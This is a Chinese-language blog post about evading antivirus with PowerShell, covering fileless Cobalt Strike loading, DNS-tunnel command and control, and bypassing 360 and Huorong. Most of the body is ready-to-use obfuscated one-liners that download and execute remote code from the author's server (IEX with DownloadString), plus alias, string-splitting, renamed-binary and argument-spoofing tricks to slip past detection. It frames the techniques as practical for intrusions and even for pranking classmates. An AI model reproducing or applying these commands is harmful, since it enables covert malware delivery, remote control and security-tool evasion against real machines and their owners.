<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="内网渗透"><title>关于powershell免杀的探索 · 9821-zed</title><meta name="description" content="由于博客兼容性问题,建议前往先知社区阅读效果更佳
文章涉及的技术并不深，只是本人在学习powerhshell免杀过程中的记录，文章的内容将涉及到powershell无文件落地上线cs、目标不出网解决办法、bypass最新360 火绒技巧以及对powershell脚本和命令混淆过程及其调用方式的绕过。"><meta name="keywords"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 4.2.1"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">9821-zed</a></h3><div class="description"><p>生活只会欺负穷人，爱情也是</p></div></div></div><ul class="social-links"></ul><div class="footer"><div class="p"> <span>© 2018 - 2020 </span><i class="fa fa-star"></i><span> 内网渗透</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><a href="https://github.com/mrcore/hexo-theme-Anatole-Core" target="_blank">Anatole-Core  </a></div><div class="beian"><a href="http://www.beian.miit.gov.cn/" target="_blank">活着比什么都好</a><span style="height:10px;margin-left: 10px;">|</span><img src="https://qn.jixian.io/gongan.png" style="height:10px;margin-left: 10px;position: relative;top: 1px;"><span style="margin-left: 2px;">粤公网安备 44030402003967号</span></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/archives">归档</a></li><li><a href="/tags">标签</a></li><li><a href="/about">关于</a></li><li><a href="/guestbook">留言</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>关于powershell免杀的探索</a></h3></div><div class="post-content"><p><strong>由于博客兼容性问题,建议前往先知社区阅读效果更佳</strong></p>
<p>文章涉及的技术并不深，只是本人在学习powerhshell免杀过程中的记录，文章的内容将涉及到<strong>powershell无文件落地上线cs、目标不出网解决办法、bypass最新360 火绒技巧以及对powershell脚本和命令混淆过程及其调用方式的绕过。</strong>不会再复述powershell的基础知识，过程中需要理解的部分，我会尽可能言简意赅，本文主要思路来源于<a href="https://www.chabug.org/web/1324.html" target="_blank" rel="noopener"><strong>Chabug</strong></a></p>
<p>由于是每晚下班写一部分 时间线会有出入还请多多包涵 有朋友问我 为什么不在本地内网搭建实验 因为免杀这东西放出来就基本凉了 无论是公网还是内网(<strong>其实做到了一半 懒得换了 反正免杀都是见光死</strong>)<br>当然还是建议大家自己实验的时候用 内网搭建虚拟机环境断网后再操作 接着重置虚拟机</p>
<h4 id="为什么会选择-powershell"><a href="#为什么会选择-powershell" class="headerlink" title="为什么会选择 powershell"></a><strong>为什么会选择 powershell</strong></h4><ul>
<li>灵活性高：具有在硬盘中易绕过，内存中难查杀的特点 能够在内存中运行代码，而不需要写入磁盘文件**(无文件攻击)**</li>
<li>多功能性：可以对操作系统主要功能进行访问 能够直接调用.Net 和 Windows API</li>
<li>普适性强：PowerShell默认安装在Windows机器上(<strong>PC:win7及以上 Ser:2008及以上默认安装</strong>)</li>
<li>易用性好：PowerShell代码易于动态生成；同时，可以很容易地嵌入恶意软件向量中，例如Office文档（通过使用宏）</li>
<li>秘性强：易于混淆、可绕过应用程序白名单、管理员信任、内存加载、缺乏日志记录PowerShell日志默认不能使用</li>
</ul>
<h4 id="什么情况下会使用到"><a href="#什么情况下会使用到" class="headerlink" title="什么情况下会使用到"></a><strong>什么情况下会使用到</strong></h4><ul>
<li>挖洞 在拿到shell后提高危害(小小的横向扩展)就是现金奖励(<strong>需注意有一定风险</strong>)</li>
<li>远控 内网渗透中方便横向移动及持久性控制</li>
<li>钓鱼 对同学恶作剧的时候隐蔽性强</li>
<li><strong>需要用到的时候(书到用时方恨少！Ps:实习中的切身感受)</strong></li>
</ul>
<hr>
<p>Ps:系统环境信息 cs3.14 （3.14与3.13中的payload不同）阿里云VPS win10<br>火绒最新版（主要演示内存加载 bypass杀软实验在后面）</p>
<h2 id="无文件攻击"><a href="#无文件攻击" class="headerlink" title="无文件攻击"></a><strong>无文件攻击</strong></h2><p>无文件攻击会综合使用系统的白名单功能，powershell属于系统工具，在杀软的白名单中，要查杀只能检测其执行的脚本代码，但因为powershell支持各种混淆、变形、加密、恶意文件放在远程服务器上，通过下载到内存中执行等方式来执行，所以对其进行检测也极为困难<strong>Ps：(优:利用文件不落地 内存中难查杀的特点  缺:有明显IP及端口连接信息)</strong></p>
<p>文章开头就提过 这里脚本来源于<a href="https://www.chabug.org/web/1324.html" target="_blank" rel="noopener"><strong>s1ye师傅</strong></a>师傅的 这里就不再班门弄斧了<br>大概介绍下采用的是loader + bin文件的形式,首先 生成异或混淆后的bin文件<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200610213640-6a8275f0-ab1f-1.png"><br>对加载器稍作修改 <strong>把bin文件放在里面 加载PS的同时加载bin 接着把ps脚本及bin文件放在cs上</strong><br>明显可以看到 流程为 <strong>远程加载ps脚本 》 远程加载bin 》 上线</strong>  (powershell 命令后面有讲)<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612195421-741c720c-aca3-1.png"></p>
<h2 id="目标不出网-DNS隧道"><a href="#目标不出网-DNS隧道" class="headerlink" title="目标不出网(DNS隧道)"></a><strong>目标不出网(DNS隧道)</strong></h2><p>DNS隧道技术是指将数据封装在DNS协议中，实现隐蔽数据传输，大部分防火墙和入侵检测设备很少会过滤DNS流量，僵尸网络和入侵攻击可几乎无限制地加以利用，实现诸如从持久性远控、文件传输等操作；DNS隧道木马难以得到有效的监控.一方面是因为DNS报文具有天然的穿透防火墙的能力；另一方面, 目前的杀毒软件、IDS等安全策略很少对DNS报文进行有效的监控管理导致在目标机器上几乎是感觉不到的<strong>Ps:(优:隐蔽性极强 能解析域名就能上线 缺:默认UDP协议传输数据较慢 不适合文件传输或者抓密码类似的大操作)</strong> 参考<a href="https://klionsec.github.io/2017/12/28/cobalt-strike-dns/" target="_blank" rel="noopener"><strong>klionsec师傅</strong></a></p>
<p>首先,你要创建一条A记录，A记录务必要指向我们自己团队服务器的ip，而后再创建几条ns记录,此处创建了两个ns记录，然后再把所有ns记录的A记录指向刚刚创建的A记录，也就是说，让解析可以准确的找到我们的团队服务器位置</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612194005-76073f7c-aca1-1.png"></p>
<p>kali中用dig +trace 域名先来简单跟踪下域名解析过程，看看我们的ns最后是不是被解析到了之前指定的A记录上，如果解析不到，也就意味着你的payload回连时很可能就定位不到团队服务器，后果就是无法正常上线，<strong>此处务必成功，再往后继续，否则都是徒劳</strong><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200613151608-c0e2ad98-ad45-1.png"><br>配置CS服务器 payload要选择<strong>beacon_dns</strong>，host要用A记录的域名，最好用一些穿透性比较强的端口(<strong>没有占用情况下优先选择：80、443、8080等因为其他端口可能作了限制</strong>)，接着把我们之前创建的那两个NS域名全部加进去,用逗号隔开即可</p>
<p>(我这里的CS破解不完全，导致只能创建一个监听器所以只有DNS监听<strong>这里为了演示DNS隧道所以直接生成的exe，实战的时候生成bin文件选择DNS方式通信，并通过上述方式powershell远程加载即可</strong>)<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200613152230-a495c084-ad46-1.png"><br>上线后会先是个黑乎乎的机器，<strong>默认初始回连时间为(一分钟)，DNS-txt是为了每次回传数据量大一点</strong><br>仔细可以发现DNS上线没有公网IP 执行mode-http(切为http传输)后即可看到目标公网IP<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200613160001-e1e67316-ad4b-1.png"></p>
<h2 id="bypass-实验"><a href="#bypass-实验" class="headerlink" title="bypass 实验"></a><strong>bypass 实验</strong></h2><p>本机:360杀毒最新版本 360安全卫士最新版本 火绒最新版本<br><strong>目前测试已知可过(卡巴斯基、趋势、windows defender)</strong><br>virustotal（在线静态查杀）</p>
<p>简单说一下 不建议把马传到VT检测，因为检测后会有很多<strong>沙盒运行能清楚看到CS上线很多主机</strong> 这样马会被分析透彻不说 VPS甚至及CS都会被标记起来<br>可以试试在<a href="https://x.threatbook.cn/" target="_blank" rel="noopener"><strong>微步</strong></a>或者<a href="https://ti.qianxin.com/" target="_blank" rel="noopener"><strong>奇安信威胁情报中心</strong></a>查询vps标记情况(登陆后查询效果更好) <strong>不说了 我先上了</strong><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200611234529-93736998-abfa-1.png"><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200611231543-6b2a36aa-abf6-1.png"><br>还有就是执行的时候有个问题就是360对powershell特别敏感会拦截调用 具体怎么绕过后面有讲到 <strong>这里能放一张就不放两张了</strong>(看不清楚的师傅 可以查看图片或者私我重新做一遍)<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200610222627-5edc5a2a-ab26-1.png"><br>对了 卡巴我也没想到 因为我之前试的时候是杀了的 今天刚好朋友帮朋友上一下(<strong>已授权 感谢Skay!</strong>)没想到上面是卡巴大哥 猜测可能是版本太低的原因<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200611221907-83266344-abee-1.png"></p>
<h2 id="powershell-混淆"><a href="#powershell-混淆" class="headerlink" title="powershell 混淆"></a><strong>powershell 混淆</strong></h2><h4 id="powershell-脚本混淆"><a href="#powershell-脚本混淆" class="headerlink" title="powershell 脚本混淆"></a><strong>powershell 脚本混淆</strong></h4><p>主要是对敏感字符串改变 参考工具 Obfuscation、xencrypt 其实还有以远程加载图片 参考<a href="https://klionsec.github.io/2017/12/26/powershell-pic-execute/" target="_blank" rel="noopener"><strong>klionsec师傅</strong></a><br><a href="https://github.com/danielbohannon/Invoke-Obfuscation" target="_blank" rel="noopener"><strong>Obfuscation</strong></a> 强烈建议执行Tutorial查看帮助 然后放在谷歌翻译效果更佳</p>
<p>如果有红色提示此系统上禁止运行脚本 Import-Module 无法加载文件，应该本地执行策略的问题。<br><strong>解决办法：管理员权限下运行：Set-ExecutionPolicy Unrestricted</strong><br>流程 加载要混淆的脚本 》 选择功能模块 》 选择混淆方式 》 最后out 1.ps1</p>
<hr>
<p>Import-Module ./Invoke-Obfuscation.psd1<br>Invoke-Obfuscation<br>set scriptpath C:\Users\Mi\Desktop\9821\xxx\xxx\xxx\xxx\Invoke-Obfuscation-master\but.ps1<br>encoding</p>
<hr>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612202429-a9ffa584-aca7-1.png"><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612202711-0a5080d4-aca8-1.png"></p>
<h4 id="xencrypt"><a href="#xencrypt" class="headerlink" title="xencrypt"></a><a href="https://github.com/the-xentropy/xencrypt" target="_blank" rel="noopener"><strong>xencrypt</strong></a></h4><hr>
<p>Import-Module ./xencrypt.ps1<br>Invoke-Xencrypt -infile .\but.ps1 -outfile buts.ps1 -iterations 5</p>
<hr>
<p>这里5表示迭代次数 当然次数越多文件越大 但体积大有什么好处毕竟更加明显 而且不利于远程加载<br>前不久忘了在哪看到篇文章 上面大概意思是 部分杀软对扫描的文件是有<strong>检测时间的限制</strong> 如果文件体积够大 导致检测时间超时就达到绕过效果<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612204535-9c197afa-acaa-1.png"></p>
<h3 id="powershell-命令混淆"><a href="#powershell-命令混淆" class="headerlink" title="powershell 命令混淆"></a><strong>powershell 命令混淆</strong></h3><p>利用<strong>别名、分割、替换变量</strong>等多个方式来绕过检测 该思路主要来源于<a href="https://www.anquanke.com/post/id/86637" target="_blank" rel="noopener">安全客</a>及<a href="https://www.freebuf.com/articles/system/227467.html" target="_blank" rel="noopener">远控免杀从入门到实践(6)-代码篇-Powershell </a><br>原始payload<br>Invoke-Expression (New-Object Net.WebClient).DownloadString(‘<a href="http://xxxx/xxx&#39;" target="_blank" rel="noopener">http://xxxx/xxx&#39;</a>)</p>
<hr>
<p>安全客<br>将http分开+号连接<br>Invoke-Expression (New-Object Net.WebClient).DownloadString(“ht”+”tp://9821.ink/xxx”)</p>
<p>变量代替<br>IEX $wc=New-Object Net.WebClient;$wc.DownloadString(‘h’+’ttp://9821.ink/xxx’)</p>
<p>转义符号加在其他字符前不影响字符的意思，避免在0,a,b,f,n,r,t,v的小写字母前出现即可。<br>Invoke-Expression (New-Object Net.WebClient).”Down**loadString”(‘h’+’ttp://9821.ink/xxx’)</p>
<p>同样可以使用在Net.Webclient上<br>Invoke-Expression (New-Object “<strong>Ne</strong>T.<strong>Web</strong>Cli<strong>ent”).”Down</strong>l**oadString”(‘h’+’ttp://9821.ink/xxx’)</p>
<p>freebuf<br>powershell -NoExit “$c1=’IEX(New-Object Net.WebClient).Downlo’;$c2=’123(‘’<a href="http://9821.ink/xxx&#39;&#39;)&#39;.Replace(&#39;123&#39;,&#39;adString&#39;);IEX" target="_blank" rel="noopener">http://9821.ink/xxx&#39;&#39;)&#39;.Replace(&#39;123&#39;,&#39;adString&#39;);IEX</a> ($c1+$c2)”</p>
<p>powershell “$a1=’IEX ((new-object net.webclient).downl’;$a2=’oadstring(‘’<a href="http://9821.ink/xxx&#39;&#39;))&#39;;$a3=&quot;$a1,$a2&quot;;IEX" target="_blank" rel="noopener">http://9821.ink/xxx&#39;&#39;))&#39;;$a3=&quot;$a1,$a2&quot;;IEX</a>(-join $a3)”</p>
<p>chabug #别名<br>powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString(‘<a href="http://9821.ink/xxx&#39;" target="_blank" rel="noopener">http://9821.ink/xxx&#39;</a>)</p>
<p>综合起来 就成了最开始的上线命令<br>powershell set-alias -name kaspersky -value Invoke-Expression;”$a1=’kaspersky ((new-object net.webclient).downl’;$a2=’oadstring(‘’<a href="http://9821.ink/xxx&#39;&#39;))&#39;;$a3=$a1,$a2;kaspersky" target="_blank" rel="noopener">http://9821.ink/xxx&#39;&#39;))&#39;;$a3=$a1,$a2;kaspersky</a>(-join $a3)”</p>
<hr>
<h3 id="powershell-调用方式"><a href="#powershell-调用方式" class="headerlink" title="powershell 调用方式"></a><strong>powershell 调用方式</strong></h3><p>主要可以粗略分为两大类，首先是绕过AV的检测规则，其次是换一个方式执行类似 PowerShell 的操作</p>
<h4 id="调用"><a href="#调用" class="headerlink" title="调用"></a><strong>调用</strong></h4><p>早在今年四月份的时候 成功实验 <strong>powershell.exe改成powershell.com</strong> 用powershell.com来执行命令就可达到绕过360及火绒的拦截<br><strong>目前360已经以对其检测拦截 遗憾的是火绒还未拦截该方法(payload为 CS3.4 powershell /a)</strong><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612214623-1adf73f0-acb3-1.png"></p>
<h4 id="欺骗"><a href="#欺骗" class="headerlink" title="欺骗"></a><strong>欺骗</strong></h4><p>还有种方法 <strong>利用cs的argue</strong> 参数欺骗 参考<a href="http://www.0x3.biz/archives/837.html" target="_blank" rel="noopener">0x3师傅</a><br>powershell一句话上线<br>直接运行powershell.exe一句话上线命令，会直接被火绒及360拦截<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612224319-0e903b4a-acbb-1.png"><br><strong>execute执行powershell.exe</strong>（shell命令不会成功，因为shell本质是cmd.exe /c arguments）<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200612223930-8626c08a-acba-1.png"><br>更多方法可以参考<a href="https://www.cnblogs.com/-mo-/p/12692559.html" target="_blank" rel="noopener"><strong>肖洋肖恩师傅</strong></a> (测试的时候发现部分已不能用了)</p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a><strong>后记</strong></h2><ul>
<li>感谢给予帮助和支持的同事、chabug论坛以及所在的白帽一百少先队，最后谢谢你</li>
<li>声明：本文章经用于经验及交流，严禁用于非法操作，出现后果一切自行承担，阅读此文章表示你已同意</li>
<li><strong>最后希望大家不要吝啬您的批评或赞美，对我来说都是莫大的支持及鼓励！</strong> </li>
</ul>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2020-06-13</span><i class="fa fa-tag"></i><a class="tag" href="/tags/免杀/" title="免杀">免杀 </a><span class="leancloud_visitors"></span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" href="http://twitter.com/home?status=,http://yoursite.com/2020/06/13/powershell混淆及免杀/,9821-zed,关于powershell免杀的探索,;" target="_blank" rel="noopener"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2020/06/25/%E5%86%85%E7%BD%91%E6%89%AB%E6%8F%8F-nbtscan/" title="内网扫描之Nbtscan">上一篇</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2020/06/02/%E6%88%91%E9%81%87%E5%88%B0%E7%9A%84%E5%AE%9E%E6%88%98%E6%B8%97%E9%80%8F/" title="我遇到的实战渗透">下一篇</a></li></ul></div><script src="/js/visitors.js"></script><a id="comments"></a><div id="vcomments" style="margin:0 30px;"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//cdn.jsdelivr.net/gh/xcss/valine@latest/dist/Valine.min.js"></script><script>var valine = new Valine({
  el:'#vcomments',
  notify:true || false, 
  verify:false|| false, 
  app_id:'rsRSoR5fW0Fh2Q7CvgJsm1v2-gzGzoHsz',
  app_key:'3srXHzWwmq9S19ucPADetjyI',
  placeholder:'你知道我在等你吗！',
  path: window.location.pathname,
  serverURLs: '',
  visitor:true,
  recordIP:true,
  avatar:'mm'
})</script></div></div></div></div><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script src="/js/baidu-tongji.js"></script></body></html>